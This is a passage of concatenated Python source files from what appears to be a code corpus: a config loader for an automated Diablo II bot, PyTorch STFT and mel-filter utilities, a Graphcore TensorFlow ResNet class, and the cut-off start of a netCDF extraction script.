if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
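# Minimal usage sketch (assumes the config/*.ini files are present):
#   config = Config()
#   if config.general["randomize_runs"]:
#       ...  # shuffle the run order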
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
    for filename in os.listdir('assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
# --- per-file quality-signal columns omitted ---
# --- next record: aps/transform/utils.py (haoxiangsnr/aps @ 38f77139b54553b0cb04b26a833bebbbf3177c5e, Apache-2.0, 19,446 bytes, 2 stars 2021-06-17..2021-09-18, hexsha 4c50b18cade6c81fd3dffac9c31804d4407603cf) ---
# Copyright 2019 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
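# Illustrative sketch (not part of the original file): building a 400-sample
# square-root Hann window.
def _demo_init_window():
    win = init_window("sqrthann", 400)
    assert tuple(win.shape) == (400,)
    return win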
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
    I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
    # B x B x 2 (sliced to W x B x 2 in kaldi mode below)
    # NOTE: th.fft here is the legacy complex FFT function, removed in
    # PyTorch 1.8+ in favor of the torch.fft module
    K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
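# Illustrative sketch (not part of the original file): kernel shapes for a
# 25 ms frame at 16 kHz. frame_len=400 is rounded up to an FFT size of 512,
# so K is 2B x 1 x W = 1024 x 1 x 512 and the returned window is padded to 512.
# Relies on the legacy th.fft (PyTorch < 1.8).
def _demo_init_kernel():
    K, w = init_kernel(400, 160, init_window("hann", 400))
    assert tuple(K.shape) == (1024, 1, 512)
    assert tuple(w.shape) == (512,)
    return K, w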
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
        num_bins: number of the frequency bins produced by STFT
        sr: sample rate of the audio signal
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
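# Illustrative sketch (not part of the original file): an 80-band mel filterbank
# for 400-sample frames (FFT size 512 gives 257 frequency bins). Assumes a
# librosa version that still accepts the positional filters.mel(sr, n_fft, ...)
# call used above (i.e. librosa < 0.10).
def _demo_mel_filter():
    fbank = mel_filter(400, num_mels=80)
    assert tuple(fbank.shape) == (80, 257)
    return fbank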
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
        src_sr: sample rate of the source signal
        dst_sr: sample rate of the target signal
        cutoff_ratio: cutoff frequency ratio of the lowpass filter
        num_zeros: number of zeros of the sinc filter (controls filter width)
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
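# Illustrative sketch (not part of the original file): a resampling filter for
# 16 kHz -> 17.6 kHz, which reduces to the rational factor 10/11 after the gcd;
# the returned weight is dst_sr x src_sr x K, here 11 x 10 x 15.
def _demo_speed_perturb_filter():
    weight = speed_perturb_filter(16000, 17600)
    assert tuple(weight.shape) == (11, 10, 15)
    return weight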
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
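# Illustrative sketch (not part of the original file): splicing one frame of
# left and one frame of right context with op="cat" triples the feature dim.
def _demo_splice_feature():
    feats = th.randn(2, 50, 40)  # N x T x F
    splice = splice_feature(feats, lctx=1, rctx=1)
    assert tuple(splice.shape) == (2, 50, 120)
    return splice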
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
        frame_hop: frame hop size in number of samples
        pre_emphasis: pre-emphasis factor
        onesided: return only half of the FFT bins
        center: if true, frames are treated as centered (reflect padding is applied)
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
        input (str), input format:
            polar: (magnitude, phase) pair
            complex: (real, imag) pair
            real: [real; imag] Tensor
        frame_hop: frame hop size in number of samples
        onesided: whether the transform contains only half of the FFT bins
        center: whether center padding was used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
    STFT function implementation, equivalent to the STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
        center: center flag (similar to that in librosa.stft)
        round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
        pre_emphasis: factor of preemphasis
        normalized: use normalized DFT kernel
        onesided: output onesided STFT
        mode: "kaldi"|"librosa", slight difference in applying the window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
    iSTFT function implementation, equivalent to the iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
        center: center flag (similar to that in librosa.stft)
        round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
        normalized: use normalized DFT kernel
        onesided: whether the input transform is onesided
        mode: "kaldi"|"librosa", slight difference in applying the window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
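# Illustrative round-trip sketch (not part of the original file): with
# center=True and matching parameters, iSTFT should reconstruct the input
# up to numerical error (again assuming the legacy th.fft, PyTorch < 1.8).
def _demo_stft_roundtrip():
    wav = th.randn(1, 16000)
    mag, pha = forward_stft(wav, 400, 160, output="polar", center=True)
    rec = inverse_stft((mag, pha), 400, 160, input="polar", center=True)
    assert rec.shape == wav.shape
    return rec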
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
        center: center flag (similar to that in librosa.stft)
        round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
        normalized: use normalized DFT kernel
        pre_emphasis: factor of preemphasis
        mode: "kaldi"|"librosa", slight difference in applying the window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
        Compute the number of frames
        """
        if th.sum(wav_len <= self.frame_len):
            raise RuntimeError(
                f"Audio is shorter than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
Accept (single or multiple channel) raw waveform and output magnitude and phase
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
Accept phase & magnitude and output raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
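# Illustrative layer usage sketch (not part of the original file): 400-sample
# frames with a 160-sample hop on a 1 s batch give F = 512 // 2 + 1 = 257
# onesided bins and T = 101 centered frames.
def _demo_stft_layer():
    stft = STFT(400, 160, window="hann", center=True)
    mag, pha = stft(th.randn(4, 16000), output="polar")
    assert tuple(mag.shape) == (4, 257, 101)
    return mag, pha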
# ======================================================================
# File: applications/tensorflow/cnns/models/resnet.py | xihuaiwen/chinese_bert @ 631afbc76c40b0ac033be2186e717885246f446c
# Python | 3,427 bytes | MIT
# ======================================================================
# Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
class TensorflowResNet(ResNet):
def __init__(self, *args, **kwargs):
self.dtype = tf.float16
super(TensorflowResNet, self).__init__(*args, **kwargs)
def _get_variable(self, name, shape, init):
return tf.get_variable(name, shape, initializer=init, dtype=self.dtype)
def residual(self, x, shortcut, out_filters, stride, type='B'):
in_shape = shortcut.get_shape()
pad = int(x.get_shape()[3] - in_shape[3])
if pad != 0 or type == 'C':
if type == 'A':
shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape,
strides=[1, stride, stride, 1])
shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]])
else:
shortcut = self.conv(shortcut, 1, stride, out_filters)
shortcut = self.norm(shortcut)
x = shortcut + x
x = self.relu(x)
return x
def relu(self, x):
return tf.nn.relu(x)
def conv(self, x, ksize, stride, filters_out, bias=True):
filters_in = x.get_shape()[-1]
wshape = [ksize, ksize, filters_in, filters_out]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
weights = self._get_variable('weights', shape=wshape, init=w_init)
x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME')
if bias:
bshape = [filters_out]
b_init = tf.zeros_initializer()
biases = self._get_variable('biases', shape=bshape, init=b_init)
x = x + biases
return x
def norm(self, x, type='BATCH', groups=32, training=False):
if type == 'BATCH':
# Perhaps use tf.nn.fused_batch_norm instead.
x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True,
training=training, trainable=training,
momentum=0.997, epsilon=1e-5)
elif type == 'GROUP':
x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True,
training=training, trainable=training,
channels_axis=-1, reduction_axes=[-3, -2])
return x
def fc(self, x, num_units_out):
num_units_in = x.get_shape()[1]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
b_init = tf.constant_initializer(0.0)
with self.namescope('fc'):
weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init)
biases = self._get_variable('biases', shape=[num_units_out], init=b_init)
x = tf.nn.xw_plus_b(x, weights, biases)
return x
def reduce_mean(self, x, indices=(1, 2)):
x = tf.reduce_mean(x, reduction_indices=indices)
return x
def maxpool(self, x):
x = tf.nn.max_pool(
x,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='SAME')
return x
def namescope(self, debug_string):
return tf.variable_scope(debug_string)
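# Illustrative sketch (not part of the original file): how these helpers are
# typically composed into a single residual unit by the ResNet base class,
# assuming an NHWC input tensor `x`:
#
#   shortcut = x
#   x = self.conv(x, ksize=3, stride=1, filters_out=64)
#   x = self.norm(x, training=True)
#   x = self.relu(x)
#   x = self.conv(x, ksize=3, stride=1, filters_out=64)
#   x = self.norm(x)
#   x = self.residual(x, shortcut, out_filters=64, stride=1, type='B')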
# ======================================================================
# File: rawcdf_extract.py | bedaro/ssm-analysis @ 09880dbfa5733d6301b84accc8f42a5ee320d698
# Python | 8,942 bytes | MIT
# ======================================================================
#!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
def get_node_ids(shps, masked):
merged = None
for i,shp in enumerate(shps):
df = gpd.read_file(shp)
df.set_index('node_id', inplace=True)
logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df)))
if merged is None:
merged = df.index
else:
merged = merged.union(df.index)
logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format(
len(merged), len(shps)))
masked_nodes = np.loadtxt(masked)
merged = merged.difference(masked_nodes)
logger.debug("{0} nodes left after masking".format(len(merged)))
return merged.to_numpy()
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
def init_output(output_cdf, indata, nodes, **kwargs):
args = Namespace(**kwargs)
output = Dataset(output_cdf, "w")
timeDim = output.createDimension('time', len(indata.dimensions['time']))
nodeDim = output.createDimension('node', len(nodes))
nodeVar = output.createVariable('node', "i4", ('node',))
output['node'][:] = nodes
timeVar = output.createVariable('time', "f4", ('time',))
# Iterate over all output variables
# If an extraction attribute is "all":
# - add the 'siglay' dimension to the output if it's not already present
# - include the 'siglay' dimension on the output variable
# - add a 'zeta' output variable
for var, attr in args.input_vars:
if attr == InputAttr.ALL:
siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS
output.createDimension('siglay', len(siglayers))
output.createVariable('siglay', 'f4', ('siglay',))
output['siglay'][:] = siglayers
if 'zeta' in indata.variables:
output.createVariable('zeta', 'f4', ('time','node'))
break
return output
def append_output(output_cdf):
return Dataset(output_cdf, 'a')
def init_output_vars(output, **kwargs):
args = Namespace(**kwargs)
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.BOTTOM:
out_name += "_bottom"
# TODO handle photic case
dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node')
output.createVariable(out_name, 'f4', dims)
# Taken from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i+n]
class InputAttr(Enum):
ALL = 0
BOTTOM = 1
# TODO add "photic" for the photic zone
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
def colon_meta(string):
    # maxsplit=1 so only the first colon separates the variable from the attribute
    var, attr = string.split(':', 1)
    return (var, attr_strings[attr])
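# Minimal check of the parser above (illustrative, not in the original script):
def _demo_colon_meta():
    assert colon_meta("DOXG:bottom") == ("DOXG", InputAttr.BOTTOM)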
def main():
script_home = os.path.dirname(os.path.realpath(__file__))
parser = ArgumentParser(description="Extract data from SSM netcdf output files")
parser.add_argument("incdf", nargs="+", help="each input CDF file")
parser.add_argument("outcdf",
